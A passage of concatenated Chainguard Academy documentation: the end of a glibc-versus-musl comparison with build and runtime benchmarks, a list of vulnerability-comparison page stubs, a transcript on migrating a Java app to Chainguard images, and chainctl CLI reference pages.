does not prevent buffer overflows by default, it will allow the program to print This is a very long string that will overflow the buffer.: Buffer content: This is a very long string that will overflow the buffer. Next test the glibc-test container: docker run --rm glibc-test glibc has built-in protection, so the output here will only let you know that the program was terminated: *** stack smashing detected ***: terminated Note: As mentioned previously, several of the remaining sections in this guide present data about the differences between glibc and musl across various categories. You can recreate some of these examples by following the same procedure of setting creating and testing container images based on the Dockerfiles and program files relevant to the example you’re exploring. You can find the appropriate files in the glibc-vs-musl directory of the Chainguard Academy Containers Demos repository. Library and Binary Size musl is significantly smaller than glibc. A primary reason for this is due to the differing approaches adhering to the Portable Operating System Interface (POSIX). POSIX is a family of standards specified by the IEEE Computer Society to ensure consistent application behavior across different systems. musl adheres strictly to POSIX standards without incorporating additional extensions. glibc, while adhering to the POSIX standards, includes additional GNU-specific extensions and features. These extensions provide enhanced functionality and convenience, offering developers comprehensive tools. As an example, glibc provides support for Intel Control Enforcement Technology (CET) when running on compatible hardware, providing control flow security guarantees at runtime — a feature that doesn’t exist on musl. However, this extensive functionality results in larger library sizes for glibc, with glibc’s function index listing over 1700 functions. You might notice the decreased binary size for musl in a simple hello world program, whether linked statically or dynamically. As we can observe, since musl is much smaller than glibc, the statically linked binary is much smaller on Alpine. In the case of dynamic linking, the binary size is smaller for musl compared to glibc because of its simplified implementation of the dynamic linker as outlined in musl project’sdesign philosophy. The following table shows the difference in binary size of statically and dynamically linked hello world programs: Distro Static linking Dynamic linking Alpine (musl) binary size 132K 12K Wolfi (glibc) binary size 892K 16K The smaller the binary size, the better the system is at debloating. You can find the Dockerfiles used in this setup in the binary-bloat directory of this guide’s example’s repository. Portability of Applications The portability of an application refers to its ability to run on various hardware or software environments without requiring significant modifications. Developers can encounter portability issues when moving an application from one libc implementation to another. That said, Hyrum’s Law reminds us that achieving perfect portability is tough. Even when you design an application to be portable, it might still unintentionally depend on certain quirks of the environment or libc implementation. One common portability issue is the smaller thread stack size used by musl. musl has a default thread stack size of 128k. glibc has varying stack sizes which are determined based on the resource limit, but usually ends up being 2-10 MB. This can lead to crashes with multithreaded code in musl, which assumes it has more than 2MiB available for each thread (as in a glibc system). Such issues cause application crashes and potentially introduce new vulnerabilities, such as stack overflows. Building from Source Performance We’ve compared the build from source performance for individual projects using the musl-gcc compiler toolchain used in Alpine and gcc compiler toolchain used in Chainguard Wolfi. We compare the build from source times of both ecosystems. The following table highlights the results of this comparison by highlighting the compilation times between Wolfi (glibc) and musl-gcc. The shorter the build time, the better the system’s performance. Repository Wolfi compilation time musl-gcc compilation Build successful with musl? binutils-gdb 18m 3.11s * No - C++17 features unsupported Little-CMS 29.44s 24.13s Yes zlib 11.48s 9.37s Yes libpcap 8.19s 5.61s Yes gmp 98.91s 99.38s Yes openssl 849.08s 671.92s Yes curl 92.33s 79.15s Yes usrsctp 55.39s 48.38s Yes You can find the Dockerfiles used in this setup in the build-comparison directory of this guide’s example’s repository. This table shows that musl-gcc has a lower compilation time than gcc on Wolfi for these projects if it can build the project successfully. musl-gcc fails to compile binutils-gdb because it conforms to POSIX standards, and binutils-gdb uses certain code features that are not conformant to these standards. The binutils project on the main branch fails to configure with native musl-gcc. Python Builds A common way to use existing Python packages is through precompiled binary wheels distributed from the Python Package Index (PyPI). Python wheels are typically built against glibc; because musl and glibc are different implementations of the C standard library, binaries compiled against glibc may not work correctly or at all on systems using musl. Due to this incompatibility, PyPI defaults to compiling from source on Alpine Linux. This implies you need to compile all the C source code required for every Python package. This also means you must determine every system library dependency needed to build the Python package from the source. For example, you have to install the dependencies beforehand, using apk add <long list of dependencies> before you perform pip install X. The following table shows PIP install times across Alpine (musl) and Wolfi (glibc). You can find the Dockerfiles used in this setup in the python-build-comparison directory of this guide’s example’s repository. Python Package Alpine (musl) Wolfi (glibc) Matplotlib, pandas 21m 30.196s 0m 24.3s tensorflow 104m 21.904s 2m 54.5s pwntools 29m 45.952s 21.5s As this table shows, this results in long build times whenever you want to use Python-based applications with musl. Take the example of pwntools, a Python package that allows for the construction of exploits in software. When using glibc-based distros, the installation would be in the form pip3 install pwntools. To install pwntools on a musl-based distro (such as Alpine), the Dockerfile is much more complicated: FROMalpine:latest# Prebuilt Alpine packages required to build from sourceRUN apk add --no-cache musl-dev gcc python3 python3-dev libffi-dev libcap-dev make curl git pkgconfig openssl-dev bash alpine-sdk py3-pipRUN python -m venv my-venvRUN my-venv/bin/python -m pip install --upgrade pip# Build from source cmake for latest versionRUN git clone https://github.com/Kitware/CMake.git && cd CMake && ./bootstrap && make && make installENV PATH=$PATH:/usr/local/bin# Build from source Rust for latest versionRUN curl --proto '=https' --tlsv1.2 https://sh.rustup.rs -sSf > setup-rust.shRUN bash setup-rust.sh -yENV PATH=$PATH:/root/.cargo/bin# Finally install pwntoolsRUN pip3 install pwnAs this Dockerfile shows, pwntools requires a set of other packages. These in turn require the most up-to-date versions of Rust and cmake, which are not available in the default prebuilt packages in Alpine. You would have to build both from source before installing the Python dependencies and, finally, pwntools. Such dependencies will have to be identified iteratively through a process of trial and error while building from source. Runtime Performance Time is critical. One common bottleneck occurs when allocating large chunks of memory repeatedly. Various reports have shown musl to be slower in this aspect. We compare this memory allocation performance between Wolfi and the latest Alpine here. The benchmark uses JSON dumping, which is known to be highly memory intensive. Runtime Alpine (musl) Wolfi (glibc) Memory Allocations Benchmark 102.25 sec 51.01 sec This table highlights how excessive memory allocations can cause musl (used by Alpine) to perform up to 2x slower than glibc (used by Wolfi). A memory-intensive application needs to be wary of performance issues when migrating to the musl-alpine ecosystem. Technical details on why memory allocation (malloc) is slow can be found in this musl discussion thread. Apart from memory allocations, multi-threading has also been problematic for musl, as shown in various GitHub issues and discussion threads). glibc provides a thread-safe system, while musl is not thread-safe. The POSIX standard only requires stream operations to be atomic; there are no requirements on thread safety, so musl does not provide additional thread-safe features. This means unexpected behavior or race conditions can occur during multiple threads. We used a Rust script (referenced from the GitHub issue) to test single-thread and multi-thread performance on Alpine (musl) and Wolfi (glibc). The next table shows performance benchmarks across single-threaded and multi-threaded Rust applications. Runtime Alpine (musl) Wolfi (glibc) Single-thread (avg of 5 runs) 1735 ms 1300 ms Multi-thread (avg of 5 runs) 1178 ms 293 ms Alpine (musl) has the worse performance out of the two, taking around 4x more time for multi-thread when compared to Wolfi (glibc). As discussed previously, the real source of thread contention is in the malloc implementation of musl. Multiple threads may allocate memory at once, or free memory may be allocated to other threads. Therefore, the thread synchronization logic is a bottleneck for performance. Experimental Warnings Developers will most likely encounter musl through Alpine image variants, such as Node.js (node:alpine) and Go (golang:alpine). Both images have similar warnings that they use musl libc instead of glibc, pointing users to this Hacker News comment thread⁠ to discuss further pros and cons of using Alpine-based images. Additionally, Node.js mentions in their building documentation: “For production applications, run Node.js on supported platforms only.” musl and Alpine are experimental supports, whereas glibc is Tier 1 support. The Go image also mentions that Alpine is not officially supported and experimental: “This (Alpine) variant is highly experimental, and not officially supported by the Go project (see golang/go#19938⁠ for details).” Unsupported Debug Features Certain applications that rely on debug features for testing — including sanitizers (such as Addressanitizer, threadsanitizer, etc.) and profilers (such as gprof) — are not supported by musl. Sanitizers help debug and detect behaviors such as buffer overflows or dangling pointers. According to the musl wiki open issues, GCC and LLVM sanitizer implementations rely on libc internals and are incompatible with musl. Feature requests have been made in the LLVM sanitizer repository for support for musl (check out this issue or this one for examples), but they have not been addressed. DNS issues The Domain Name System (DNS) is the backbone of the internet. It can be thought of like the internet’s phonebook, mapping internet protocol (IP) addresses to easy-to-remember website names. Multiple historical sources on the web have pointed out DNS issues when using musl-related distros. Some have pointed out issues with TCP (which is fixed in Alpine 3.18), and others have pointed out random cases with DNS resolution issues. Please refer to the following resources regarding musl’s history with DNS: GitHub issue highlighting DNS Resolution in K3s using Alpine Linux The tragedy of gethostbyname - Blog Does Alpine resolve DNS properly? - Blog musl-libc - Alpine’s Greatest Weakness - Blog Conclusion glibc and musl both serve well as C implementations. Our goal for this article is to explain Chainguard’s rationale for choosing to use glibc for Wolfi. We believe that’s what made the most sense for our project, but you should continue your own research to determine if one C implementation would suit your needs better than another. If you spot anything we’ve overlooked regarding glibc or musl or have additional insights to contribute, please feel free to raise the issue in chainguard-dev/edu. We welcome further discussion on weaknesses in glibc, such as its larger codebase and complexity compared to musl. Additionally, insights into the intricacies of compiler toolchains for cross-compilation are welcomed, especially when dealing with glibc and musl. Finally, we encourage you to check out this additional set of articles and discussions about others’ experiences with musl: Why I Will Never Use Alpine Linux Ever Again - Blog Why does musl make my Rust code so slow? - Blog GitHub issue: Investigate musl performance issues Using Alpine can make Python Docker builds 50× slower - Blog Comparison of C/POSIX standard library implementations for Linux - Blog GitHub issue: Officially support musl the same way glibc is supported GitHub issue: Musl as default instead of glibc GitHub issue: Convert docker builds to use debian/glibc images, away from docker alpine/musl --- ### Vulnerability Comparison: bash URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/bash/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: busybox URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/busybox/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: curl URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/curl/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: deno URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/deno/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dex URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dex/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dotnet-runtime URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dotnet-runtime/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dotnet-sdk URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dotnet-sdk/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: etcd URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/etcd/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: git URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/git/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: go URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/go/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: gradle URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/gradle/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: haproxy URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/haproxy/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: jenkins URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/jenkins/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: kube-state-metrics URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/kube-state-metrics/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: mariadb URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/mariadb/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: maven URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/maven/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: memcached URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/memcached/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: minio URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/minio/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: minio-client URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/minio-client/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: nats URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/nats/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: nginx URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/nginx/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: node URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/node/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: opensearch URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/opensearch/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: php URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/php/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: postgres URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/postgres/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: python URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/python/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: r-base URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/r-base/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: rabbitmq URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/rabbitmq/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: redis URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/redis/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: ruby URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/ruby/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: rust URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/rust/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: telegraf URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/telegraf/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: traefik URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/traefik/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: wait-for-it URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/wait-for-it/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: wolfi-base URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/wolfi-base/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: zookeeper URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/zookeeper/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### How to Migrate a Java Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/java-images/ Last Modified: April 2, 2024 Tools used in this video Docker Resources Blog on bootstrapping Java in Wolfi Learning Labs Git repository with code used in demo Transcript Okay, I want to give a quick overview of how to use the Chainguard Java images. And in particular, I want to show how to port an existing application to use the Chainguard Java images. So our images are largely equivalent to the existing Java images that you can find on the Docker Hub, such as the Eclipse Temurin ones. The difference is that we’re much more focused on producing minimal images with a low CVE count. We do build our own JDK and there’s a really great blog on the Chainguard site that explains how we do this and how we bootstrap from the really early versions of Java, which I thoroughly recommend checking out and I will link in the notes. For this video I’m going to use an example created by my colleague Mauren Berti, so all the hard work in this video is actually down to her. So the starting point for this video is this example app. It’s a Spring Boot app and all it does is listen on port 8080 and return “Hello world” effectively. So here is the Dockerfile and we can see it starts with FROM maven. So this is using the Docker official image for maven which itself is built on top of Eclipse Temurin. All we’re doing then is copying over some source code, building it with maven, doing a little bit of cleanup on this step to get rid of some build artifacts and then we’re copying the jar file to the app directory and setting an entrypoint. So we should be able to build that fairly easily and now I should be able to run it. That was pretty quick because it was cached already. If you build it yourself it will take a little bit longer because it will have to download all the various dependencies. So let’s see if I can get this right. docker run --rm -d --port 8080 to port 8080 on the host. Image was called java-maven. So now hopefully if I do curl localhost:8080/hello I get “Hello world” back. So that’s the application working. We can take a look at the logs if we like. Okay nothing surprising there. It’s a Tomcat application. So if we look at the size of the image we can see it’s 585 megabytes. So quite a large container but nothing too surprising for a Java image. If we look at the CVEs – I’m going to use Docker Scout, use grype or whatever – then you can see Docker Scout is reporting there’s 10 medium and 17 low CVEs. Honestly I don’t think it’s a terrible result but let’s see if we can do better. So let’s take a look at this Dockerfile and what I’m going to do here is change to use cgr.dev/chainguard/maven. So that’s using the cgr.dev, Chainguard’s registry. You could just delete the cgr.dev and use the Docker Hub because we now have Chainguard images on the Docker Hub under the Chainguard workspace. But let’s just do that for the minute and we will rebuild it. This time I’ll add “cg” on the end so we can see the difference. And there we go. So let’s take a look at java-maven-cg. So I think we are 585 megabytes. So we’ve dropped it by 220 megabytes or 225 megabytes to 360 megabytes. So that’s a fairly big saving by just making – just adding – cgr.dev/chainguard to the start. But more interestingly what happens to the CVEs? So if I run Docker Scout on this image we see there’s zero CVEs. So I’ve made a very small change and we’ve dropped the size of the image and we’ve removed all the known CVEs. So that’s a pretty effective change in my book. But we can still take it further. I’m going to use Mauren’s hard work and we’ll look at how you can create a multi-stage Docker build. I’ve done docker reset. I meant to do git reset. Okay. git switch to the Chainguard multi-stage JRE image. And if we look at the Dockerfile and what we now have is a multi-stage build. So we’re using the maven image as a builder. So we’ve got this “as builder” step but now we’ve got a second build step down here where we say “as runner”. So this code is more or less the same. We have taken out the entrypoint but now we’re copying the jar file from the builder and running it here. And this image is just a JRE image. So it doesn’t have all the build tooling associated with the maven image. Okay let’s try building that. That looks good. So if I do… well I guess we should prove it still works. So if I do docker run. I’ll do docker ps first. docker rm -f 12 Now if I do docker run again. So java-maven-multi-chainguard. curl localhost 8080/hello So still working just the same as before but now java-maven-multi-cg – we can see we’ve got the size down a little bit further. So I think it was what 360 megabytes and now we’ve got it down to 325 megabytes. So we’ve removed 35 megabytes of build tooling in there. And also if we check the CVEs again hopefully that will still be zero. Yeah, so zero CVEs but we’ve reduced the size and number of packages in the image. So that’s quite a big win. Took a little bit more work to get to the multi-stage build but not a ridiculous amount. So that’s about it. We’ve seen how you can use Chainguard’s maven and JRE images to reduce the size and CVE count in a Java application with relatively little work. Please do take a look and let me know how you get on. --- ### chainctl URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl Chainguard Control chainctl [flags] Options --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. -h, --help help for chainctl --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. chainctl config - Local config file commands for chainctl. chainctl events - Events related commands for the Chainguard platform. chainctl iam - IAM related commands for the Chainguard platform. chainctl images - Images related commands for the Chainguard platform. chainctl libraries - Ecosystem library related commands. chainctl packages - Interact with Chainguard packages chainctl update - Update chainctl. chainctl version - Prints the version --- ### chainctl auth URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth Auth related commands for the Chainguard platform. Options -h, --help help for auth Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl auth configure-docker - Configure a Docker credential helper chainctl auth login - Login to the Chainguard platform. chainctl auth logout - Logout from the Chainguard platform. chainctl auth pull-token - Create a pull token. chainctl auth status - Inspect the local Chainguard Token. chainctl auth token - Print the local Chainguard Token. --- ### chainctl auth configure-docker URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_configure-docker/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth configure-docker Configure a Docker credential helper chainctl auth configure-docker [flags] Options --headless Skip browser authentication and use device flow. -h, --help help for configure-docker --identity string The unique ID of the identity to assume when logging in. --identity-provider string The unique ID of the customer managed identity provider to authenticate with --identity-token string Use an explicit passed identity token or token path. --name string Optional name for the pull token (default "pull-token") --org-name string Organization to use for authentication. If configured the organization's custom identity provider will be used --parent string The IAM organization or folder with which the pull-token identity is associated. --pull-token Whether to register a pull token that can pull images --save If true with --pull-token, save the pull token to the Docker config --ttl duration For how long a generated pull-token will be valid. (default 720h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth login URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_login/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth login Login to the Chainguard platform. chainctl auth login [--invite-code=INVITE_CODE] [--identity-token=PATH_TO_TOKEN] [--identity=IDENTITY_ID] [--identity-provider=IDP_ID] [--org-name=ORG_NAME] [--social-login={google|github|gitlab}] [--headless] [--prefer-ambient-credentials] [--refresh] [--output=id|json|none|table] Examples # Default auth login flow: chainctl auth login # Refreshing a token within a Kubernetes context: chainctl auth login --identity-token=PATH_TO_TOKEN --refresh # Headless login using --org-name chainctl auth login --headless --org-name my-org # Register by accepting an invite to an existing location chainctl auth login --invite-code eyJncnAiOiI5MzA... Options --headless Skip browser authentication and use device flow. -h, --help help for login --identity string The unique ID of the identity to assume when logging in. --identity-provider string The unique ID of the customer managed identity provider to authenticate with --identity-token string Use an explicit passed identity token or token path. --invite-code string Registration invite code. --org-name string Organization to use for authentication. If configured the organization's custom identity provider will be used --prefer-ambient-credentials Auth with ambient credentials, if present, before using a supplied identity token. --refresh Enable auto refresh of the Chainguard token (for workloads). --skip-browser Skip opening a browser for login --social-login string Which of the default identity providers to use for authentication. Must be one of: google, github, gitlab --sts-http1-downgrade Downgrade STS requests to HTTP/1.x --validate Validates token after exchange (default true) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth logout URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_logout/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth logout Logout from the Chainguard platform. chainctl auth logout [--audience=AUDIENCE] Options -h, --help help for logout Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth pull-token URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_pull-token/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth pull-token Create a pull token. chainctl auth pull-token [--output=env|json] [flags] Options -h, --help help for pull-token --library-ecosystem string The language ecosystem to create this pull token for (e.g. python, java). --name string Optionally set the name for the token (default "pull-token") --parent string The IAM organization or folder with which the pull-token identity is associated. --save If true with --pull-token, save the pull token to the Docker config --ttl duration For how long a generated pull-token will be valid. (default 720h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth status URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_status/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth status Inspect the local Chainguard Token. chainctl auth status [--output=json|table|terse] [flags] Options -h, --help help for status --identity-token string Use an explicit passed identity token or token path. --quick Whether to perform quick offline token checks (vs. calling the Validate API). Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth token URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_token/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth token Print the local Chainguard Token. chainctl auth token [flags] Options -h, --help help for token Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl config URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config Local config file commands for chainctl. Options -h, --help help for config Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl config edit - Edit the current chainctl config file. chainctl config reset - Remove local chainctl config files and restore defaults. chainctl config save - Save the current chainctl config to a config file. chainctl config set - Set an individual configuration value property. chainctl config unset - Unset a configuration property and return it to default. chainctl config validate - Run diagnostics on local config. chainctl config view - View the current chainctl config. --- ### chainctl config edit URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_edit/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config edit Edit the current chainctl config file. Synopsis Edit the current chainctl config file. Use the environment variable 